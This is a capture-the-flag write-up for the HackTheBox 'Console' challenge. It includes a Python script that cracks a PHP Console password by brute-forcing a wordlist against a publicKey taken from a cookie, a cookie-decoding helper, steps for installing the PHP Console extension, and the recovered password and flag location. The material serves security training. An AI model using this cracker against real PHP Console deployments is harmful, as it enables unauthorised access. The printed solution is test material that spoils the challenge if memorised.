HackTheBox Console Challenge
https://app.hackthebox.com/challenges/113
Description
Could you please check the console of your Chrome?
Exploitation
Copy the php-console-client cookie, decode it, and extract the publicKey. Replace pubkey and ip_address in the PoC with the extracted publicKey and the IP address displayed on the webpage.
#!/usr/bin/env python3
import hashlib
import sys


def crack():
    salt = "NeverChangeIt:)".encode()
    ip_address = "10.30.18.25".encode()
    pubkey = "370244b500c702b16dddb1678c882d2b7aa0b3bcdf94fb6bb9e792460c5d460b"
    # latin-1 maps every byte to a character, so reading the wordlist never fails.
    with open("/usr/share/dict/rockyou.txt", "r", encoding="latin-1") as infile:
        # Read line by line so candidates that contain spaces stay intact.
        for line in infile:
            word = line.rstrip("\r\n")
            # publicKey = sha256(ip_address + hex(sha256(password + salt)))
            password = hashlib.sha256(word.encode("latin-1") + salt).hexdigest().encode()
            attempt = hashlib.sha256(ip_address + password).hexdigest()
            if attempt == pubkey:
                return word
    return None


if __name__ == "__main__":
    try:
        found = crack()
    except KeyboardInterrupt:
        sys.exit(1)
    print(found if found is not None else "No match in wordlist")
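The cookie-decoding step that precedes the PoC, as an added example (not part of the original write-up or of PHP Console's own code). It assumes the php-console-client cookie value is base64-encoded JSON with a publicKey field somewhere inside; the sample cookie and its field layout are constructed for illustration.

```python
import base64
import binascii
import json
import re
from urllib.parse import unquote

HEX64 = re.compile(r"[0-9a-f]{64}")


def find_key(node, name="publicKey"):
    """Depth-first search for `name` in decoded JSON, wherever it is nested."""
    if isinstance(node, dict):
        if name in node:
            return node[name]
        children = node.values()
    elif isinstance(node, list):
        children = node
    else:
        return None
    for child in children:
        found = find_key(child, name)
        if found is not None:
            return found
    return None


def extract_public_key(cookie_value):
    """Return the publicKey from a php-console-client cookie value, or None."""
    raw = unquote(cookie_value.strip())      # DevTools may show '=' as %3D
    raw += "=" * (-len(raw) % 4)             # restore stripped base64 padding
    try:
        data = json.loads(base64.b64decode(raw, validate=True))
    except (binascii.Error, ValueError):
        return None                          # not base64-encoded JSON
    key = find_key(data)
    # The PoC compares against a SHA-256 hex digest, so insist on 64 hex chars.
    if isinstance(key, str) and HEX64.fullmatch(key.lower()):
        return key.lower()
    return None


# Constructed sample cookie (field layout assumed; key value copied from the PoC).
SAMPLE_KEY = "370244b500c702b16dddb1678c882d2b7aa0b3bcdf94fb6bb9e792460c5d460b"
SAMPLE_COOKIE = base64.b64encode(json.dumps(
    {"php-console-client": 5, "auth": {"publicKey": SAMPLE_KEY, "token": ""}}
).encode()).decode().replace("=", "%3D")

if __name__ == "__main__":
    print(extract_public_key(SAMPLE_COOKIE))
```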
Clone the extension: git clone https://github.com/barbushin/php-console-extension
In Chromium, enable developer mode in chrome://extensions/
Click "Pack extension" and select the directory of the php-console-extension repo.
Drag and drop the packed .crx extension.
Go to the webpage and send the password poohbear.
Your request headers reveal that PHP Console Debugging is enabled on the server, which exposes sensitive data in the php-console header. The key steps to extract useful information:
Open Developer Tools (F12) and navigate to the “Network” Tab.
Refresh the page (F5) and check the php-console response header to retrieve the flag without needing to type it.
Summary
Console: abuse PHP to cross the web trust boundary and recover the flag.